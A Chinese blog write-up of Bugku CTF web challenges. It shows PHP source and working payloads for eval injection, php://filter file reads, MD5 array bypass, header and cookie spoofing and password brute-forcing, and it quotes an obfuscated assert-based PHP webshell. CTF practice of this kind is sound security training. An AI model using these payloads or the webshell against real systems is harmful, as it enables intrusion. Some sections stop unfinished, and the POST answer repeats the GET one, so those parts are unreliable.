BugkuCTF—Web writeup第一部分

最新推荐文章于 2021-01-26 14:49:59 发布
最新推荐文章于 2021-01-26 14:49:59 发布
阅读量1.6k 收藏 3
点赞数
分类专栏: 各CTF平台 Writeup 文章标签: Bugku CTF writeup web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/98225434
版权

BugkuCTF—Web writeup第一部分


BugkuCTF链接

web2

分值:20
听说聪明的人都能找到答案
题目地址
web2
进入网页后为持续加快的滑稽表情,查看网页源码得到flag

<body id="body" onLoad="init()">
<!flag KEY{Web-2-bugKssNNikls9100}>

计算器

分值:30
题目地址
计算器
进入页面后,需要计算出结果提交,但输入框被限制了字符限制,查看网页源码:

<span id="code" class="nocode">验证码</span> 
<input type="text" class="input" maxlength="1"/>

将“/”标签中的“maxlength”属性删除掉或修改为适合长度,验证得到flag
flag

web基础$_GET

分值:30
题目地址

$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

分析代码:通过GET传参方式输入变量what的值,使变量what等于flag即输出flag,在地址栏构造如下传参:?what=flag,访问得到flag:flag{bugku_get_su8kej2en}

web基础$_POST

分值:30
题目地址

$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

分析代码:通过POST传参方式输入变量what的值,使变量what等于flag即输出flag,在地址栏构造如下传参:?what=flag,访问得到flag:flag{bugku_get_su8kej2en}

矛盾

分值:30
题目地址

$num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';
}

分析代码:通过GET方式传入变量num的值,传入的值不能为数字,但需要等于“1”。
通过“is_numeric()”函数遇到%00截断的漏洞,构造GET传参:?num=1%00,访问后得到flagflag{bugku-789-ps-ssdf}

web3

分值:30
flag就在这里快来找找吧
题目地址

打开后会一直重复两个弹窗:
在这里插入图片描述在这里插入图片描述
重复点击确定后,弹窗会消失,查看网页源码,发现注释内有一段可疑的编码:

<!--&#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&#104;&#74;&#75;&#45;&#72;&#83;&#49;&#49;&#73;&#73;&#73;&#125;-->

在线HTML解码,得到flag:KEY{J2sa42ahJK-HS11III}

域名解析

分值:50
听说把 flag.baidu.com 解析到123.206.87.240 就能拿到flag

Windows系统下,访问文件地址:C:\Windows\System32\drivers\etc,在当中的host文件中:
在这里插入图片描述
使用记事本打开文件,在其中填入:123.206.87.240 flag.baidu.com
在这里插入图片描述
保存文件后,访问http://flag.baidu.com,得到flagKEY{DSAHDSJ82HDS2211}
在这里插入图片描述

你必须让他停下

分值:60
作者:@berTrAM
题目地址

CTF
进入一面后会一直刷新,尝试用Burp Suite抓取数据包,Send to Repeater,重复发送几次数据包,在Response中得到flag
flag

本地包含

分值:60
题目地址

//题目源码已给出
<?php 
error_reporting(0); 
include 'flag.php'; 
$a = @$_REQUEST['hello']; 
eval(" var_dump( $a );"); 
highlight_file(__FILE__); 
?>

分析代码:本地包含了flag.php,需要为变量hello赋值,然后将变量a的相关情况作为PHP代码来执行。
我们可以通过eval()函数输出flag.php文件的内容,通过对变量hello赋值:

http://123.206.87.240:8003/?hello=file_get_contents('flag.php')

然后查看网页源码便得到flag

<?php
//flag(too-young-too-simple)
//听说中国菜刀挺好用
//是挺好用
?>

变量1

分值:60
题目地址

flag In the variable !
 <?php  
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
    eval("var_dump($$args);");
}
?>

分析代码:包含有flag1.php,需要通过GET方式传入变量args的值,不能出现大小写字母和数字,在eval()函数中出现可变变量($$args)。

通过eval()函数执行漏洞,PHP在名为 “$GLOBALS[index]” 的数组中存储了所有全局变量。变量的名字就是数组的键。所以将?args=GLOBALS传入,便得到flag
flag

web5

分值:60
JSPFUCK???答案格式CTF{*}
字母大写
题目地址
JSPFUCK
进入页面后有输入框,查看网页源码:
源码
源码中有JSFuck编码JSFuck是一种基于JavaScript的编码方式,它只使用六个不同的字符来编写和执行代码。因为是基于JavaScript,所以可以在浏览器F12控制台直接执行:
flag
将运行后的结果大写,提交检测为真实flag
flag

头等舱

分值:60
题目地址

进入页面后显示:“什么也没有。”,提示为“”,尝试用Burp Suite抓取数据包,Send to Repeater,发送数据包,在Response中得到flag
flag

网站被黑

分值:60
这个题没技术含量但是实战中经常遇到
题目地址
网站被黑
攻击者在黑入网页后,通常会给自己留有后门,尝试通过御剑进行后台扫描:

管理员系统

分值:60
flag格式flag{}
题目地址
管理员系统
查看网页源码,在最底下得到提示:

<!-- dGVzdDEyMw== -->

判断为Base64编码在线解码Base64,得到解码后的结果:test123
输入用户名:admin及密码:test123登陆,显示:IP禁止访问,请联系本地管理员登陆,IP已被记录.
提示为本地,使用Google Chrome插件ModHeaderHTTP请求头中添加本地地址X-Forwarded-For:127.0.0.1
在这里插入图片描述
再次登陆后,得到flagflag{85ff2ee4171396724bae20c0bd851f6b}

web4

分值:80
看看源代码吧
题目地址
在这里插入图片描述
提示为看看源代码:

<script>
var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
eval(unescape(p1) + unescape('%35%34%61%61%32' + p2));
</script>

两变量值均为URL编码,根据eval函数所给出的,p1 + %35%34%61%61%32 + p2在线URL解码,得到源代码:
在这里插入图片描述

function checkSubmit()
{
    var a = document.getElementById("password");
    if ("undefined" != typeof a) {
        if ("67d709b2b54aa2aa648cf6e87a7114f1" == a . value)
            return !0;
        alert("Error");
        a . focus();
        return !1
    }
}
document . getElementById("levelQuest") . onsubmit = checkSubmit;

67d709b2b54aa2aa648cf6e87a7114f1提交得到flagKEY{J22JK-HS11}

flag在index里

分值:80
题目地址
进入页面后显示:click me? no,点击跳转到新页面:http://123.206.87.240:8005/post/index.php?file=show.php,页面显示的是show.php页面的内容:test5
尝试使用伪协议读取index.php的源码,构造如下payload?file=php://filter/read=convert.base64-encode/resource=index.php,将index.php的源码转换为base64编码在线BASE64解码得到源码:

<html>
    <title>Bugku-ctf</title>
    
<?php
	error_reporting(0);
	if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "Oh no!";
		exit();
	}
	include($file); 
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>

得到flagflag{edulcni_elif_lacol_si_siht}

输入密码查看flag

分值:80
作者:Se7en
题目地址

打开题目后,看到需要输入5位数密码:
在这里插入图片描述
地址栏给出提示:http://123.206.87.240:8002/baopo/,使用Burp Suite抓取数据包,获取所需的信息:
在这里插入图片描述
可以使用Burp SuiteIntruder模块的功能:
在这里插入图片描述
设置类型为数字模式,从1000099999,开始爆破,根据返回长度不同,判断为正确密码:
在这里插入图片描述
也可以使用Python3脚本尝试爆破,源码如下:

import requests

url = 'http://123.206.87.240:8002/baopo/'
for i in range(10000, 99999):
    data = {'pwd': i}
    result = requests.post(url, data=data)
    print(i)
    if len(result.text) != 1190:
        print("Right")
        break

得到密码为:13579
在这里插入图片描述
输入密码,得到flagflag{bugku-baopo-hah}

点击一百万次

分值:80
hints:JavaScript
题目地址
在这里插入图片描述
需要点击一百万次,但提示为JavaScript,查看网页源码:

<script>
    var clicks=0
    $(function() {
      $("#cookie")
        .mousedown(function() {
          $(this).width('350px').height('350px');
        })
        .mouseup(function() {
          $(this).width('375px').height('375px');
          clicks++;
          $("#clickcount").text(clicks);
          if(clicks >= 1000000){
          	var form = $('<form action="" method="post">' +
						'<input type="text" name="clicks" value="' + clicks + '" hidden/>' +
						'</form>');
						$('body').append(form);
						form.submit();
          }
        });
    });
  </script>

分析代码:存在变量clicks,当变量clicks的值大于1000000时,输出flag
使用Google Chrome的插件HackBar进行POST方式的传参:clicks=1000000
在这里插入图片描述
得到flag:flag{Not_C00kI3Cl1ck3r}

备份是个好习惯

分值:80
听说备份是个好习惯
题目地址
进入页面后显示一段字符串:d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e在线md5解密得到:[空密码]/[Empty String]
根据提示备份,访问index.php.bak,下载到一段源码:

<?php
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str, 1);
$str = str_replace('key', '', $str);
parse_str($str);
echo md5($key1);
echo md5($key2);
if (md5($key1) == md5($key2) && $key1 !== $key2) {
    echo $flag . "取得flag";
}
?>

分析代码: 包含文件flag.php,通过地址栏传入变量的值,strstr() 函数返回?(包含?)之后的字符串,substr() 函数将字符串的?去掉, str_replace() 函数将字符串中的key替换为空,parse_str() 函数把查询字符串解析到变量中,当变量key1的值与变量key2的值不相等,但经过md5加密后的值相等时,输出flag
在地址栏构造如下Payload:?kekeyy1[]=1&kkeyey2[]=2,传递参数得到flag:Bugku{OH_YOU_FIND_MY_MOMY}

成绩单

分值:90
快来查查成绩吧
题目地址
在这里插入图片描述
输入合法的数据,显示为正常的页面:
在这里插入图片描述
输入超出的数据,得到空白的页面:
在这里插入图片描述

秋名山老司机

分值:100
是不是老司机试试就知道。
题目地址
进入页面后显示:
在这里插入图片描述
或者为(多刷新几次):
在这里插入图片描述
即提示为通过POST方式传入变量value的值,

构造如下Python脚本

import requests
import re
url = 'http://123.206.87.240:8002/qiumingshan/'
s = requests.Session()
source = s.get(url)
expression = re.search(r'(\d+[+\-*])+(\d+)', source.text).group()
result = eval(expression)
post = {'value': result}
print(s.post(url, data=post).text)

运行几次得到flag:Bugku{YOU_DID_IT_BY_SECOND}

速度要快

cookies欺骗

分值:100
答案格式:KEY{xxxxxxxx}
题目地址
进入页面后为一串重复字符串,在地址栏发现传参语句:?line=&filename=a2V5cy50eHQ=,变量line值为空,变量filename的值进行在线Base64解码得到keys.txt,判断该传参语句作用为读取文件源码,尝试将变量filename的值修改为index.phpBase64编码,即aW5kZXgucGhw,通过Python脚本,跑出全部源代码:

import requests

url1 = 'http://123.206.87.240:8002/web11/index.php?line='
url2 = '&filename=aW5kZXgucGhw'
for i in range(0, 50):
    url = url1 + str(i) + url2
    re = requests.Session()
    source = re.get(url).text
    print(source)

得到源代码:

<?php
error_reporting(0);
$file = base64_decode(isset($_GET['filename']) ? $_GET['filename'] : "");
$line = isset($_GET['line']) ? intval($_GET['line']) : 0;
if ($file == '') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' => 'keys.txt',
    '1' => 'index.php',
);
if (isset($_COOKIE['margin']) && $_COOKIE['margin'] == 'margin') {
    $file_list[2] = 'keys.php';
}
if (in_array($file, $file_list)) {
    $fa = file($file);
    echo $fa[$line];
}
?>

分析代码:需要设置HTTP请求头信息Cookiemargin=margin,使用BurpSuite抓取数据包,修改信息:
在这里插入图片描述
发送数据包,在网页源码中的到flag:<?php $key='KEY{key_keys}'; ?>

never give up

分值:100
作者:御结冰城
题目地址
进入页面后显示:never never never give up !!!,查看网页源码得到提示:<!--1p.html-->,访问该页面后跳转到CTF论坛首页,直接访问页面源码:view-source:http://123.206.87.240:8006/test/1p.html,得到一段编码提示:

<!--


var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ%3D%3D--%3E" 
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
} 
OutWord();
// -->

判断为URL编码,将变量var Words的值进行在线URL解码,得到一段Base64编码在线Base64解码得到一段URL编码在线URL解码,得到一段源代码:

<?php
if (!$_GET['id']) {
    header('Location: hello.php?id=1');
    exit();
}
$id = $_GET['id'];
$a = $_GET['a'];
$b = $_GET['b'];
if (stripos($a, '.')) {
    echo 'no no no no no no no';
    return;
}
$data = @file_get_contents($a, 'r');
if ($data == "bugku is a nice plateform!" and $id == 0 and strlen($b) > 5 and eregi("111" . substr($b, 0, 1), "1114") and substr($b, 0, 1) != 4) {
    require("f4l2a3g.txt");
} else {
    print "never never never give up !!!";
}
?>

访问f4l2a3g.txt得到flagflag{tHis_iS_THe_fLaG}

welcome to bugkuctf

分值:100
作者:pupil
题目地址
在这里插入图片描述

过狗一句话

分值:100
送给大家一个过狗一句话
<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>

进入页面后显示:此站没有flag,flag被人删了,不用再做了。–一个做题的路人

Senimo_
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku-writeup-web-文件包含
dark的博客
06-14 1万+
bugku-web13解题思路记录。” 题目:click me? no
CTF-web Xman-2018 第五天 WEB习题2
iamsongyu的博客
12-15 597
查看源码 http://120.24.86.145:8002/web2/ 没什么可说的 直接查看源码就可以   带有转义的编码 http://120.24.86.145:8002/web3/     进入之后看到一串奇怪的东西 &amp;#75;&amp;#69;&amp;#89;&amp;#123;&amp;#74;&amp;#50;&amp;#115;&amp;#97;&amp...
BugkuCTF web3
weixin_34161032的博客
05-04 127
前言 写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ 点开链接以后发现一直弹出下面这两个框   我在Chrome找了半天,尝试着禁止弹窗却毫无办法,于是,我直接view-source查看页面源码   若干条语句,e...
click me? no
qq_48511129的博客
01-26 1580
解题思路:看到index.php,可能是文件包含漏洞,于是我去网上找了一下文件包含漏洞构造url,查看文件内容 http://114.67.246.176:15492/index.php?file=php://filter/read=convert.base64-encode/resource=index.php得到一串代码 我用burpsuite编码器进行base64解码得到flag ...
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
bugku杂项题writeup
11-22
bugku杂项题writeup
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
首先,第一层绕过机制涉及到字符串比较和MD5哈希。题目中,系统检查`$_POST['param1']`和`$_POST['param2']`是否不相等,同时它们的MD5哈希值是否相等。参赛者通过使用两个不同的字符串`240610708`和`QNKCDZO`,即使...
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。目录 ...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
web在线解码
07-06
支持在线解码,可以上传微博、QQ、微信二维码等图片在线解析!
BugkuCTF WEB解题记录 6-10
aap49042的博客
08-06 480
写了一部分web题,算是把它最基础的一部分做了一遍,以后的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每五道题的题解以一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ 矛盾 打开链接http://120.24.86.145:8002/get/index1.php 查看显示的源码 $num=$_GET['num']; if(...
HTML转义字符大全
zhengxiangwen的专栏
04-26 1062
半方大的空白:     全方大的空白:     不断行的空白格:  换行的转义字符是:
用python写的一个实用小脚本-1
a3uRa的一个窝
08-23 1618
a=[75,69,89,123,74,50,115,97,52,50,97,104,74,75,45,72,83,49,49,73,73,73,125] b='' for i in a: b=b+chr(i) print(b) 可以将多个ascii码值,转换为字符串 例如 KEY{J2sa42ahJK-HS11III} 可以用记事本 替换字符 然后用脚本直接ascii转字符串...
CTF——实验吧(web总结1.1)
热门推荐
加载中...
10-19 1万+
地址:http://www.shiyanbar.com/ctf/practice 一、你能跨过去吗题目:?,你是在问我吗???你是在怀疑我的能力吗??? 解题链接: http://ctf1.shiyanbar.com/basic/xss/ 思路: 1、发现所给字串中有%+数字,怀疑使用escape加密了url,使用站长工具http://tool.chinaz.com/Tools/Escape.
Bugku-Web题wp (前九题)
Risker
03-14 1044
分享一下本人做题记录,不足之处多多指正。这里先贴一波之前的做题记录,还在更新中(补之前的wp)签到题:直接加入qq群,公告里就有key: Web2:打开发现都是滑稽,查看源代码就可以找到key了: 文件上传:上传php文件,显示不是图片,上传图片,又必须是php,显然普通上传不能同时满足这两个条件,所以上传个图片用burp抓包,发送到repeater:观察到有个filename=”****.png...
drops夏令营 第四天主要做了web
yumengzth的博客
07-20 357
1./X00 view-source: if (isset ($_GET['nctf'])) { if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE) echo '必须输入数字才行'; else if (strpos ($_GET['nctf'], '#biubiubiu') !=...
ctf 选择题 题库_实验吧CTF题库-WEB题(部分)
weixin_39613548的博客
12-19 1221
看起来有点难提交adminhttp://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login用sqlmap检测是否有注入┌─[root@sch01ar]─[/sch01ar]└──╼ #sqlmap -u "http://ctf5.shiyanbar.com/basic/injec...
bugkuctf-web(Writeup)
凝聚力安全团队
11-07 2791
目录web2计算器计算器 web2 题目: http://123.206.87.240:8002/web2/ Writeup: #查看页面源代码 ctrl + U F12 view-source: 计算器 题目: http://123.206.87.240:8002/yanzhengma/ Writeup: 正确答案是两位数字,maxlength限制了我们输入的字数,只允许输入1位。 由于前端代码在我们浏览器加载的,我们可以随意控制前端代码,修改maxlength大一些,再输入正确答案,即可获取f
2018强网杯CTF Web挑战解析:绕过与解密
第一Web签到题目中,题目设计了一个条件判断,要求`param1`与`param2`不相等,但它们的MD5哈希值却要相等。这是一个典型的哈希碰撞问题。通过使用两个不同的字符串,例如`param1=240610708`和`param2=QNKCDZO`,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值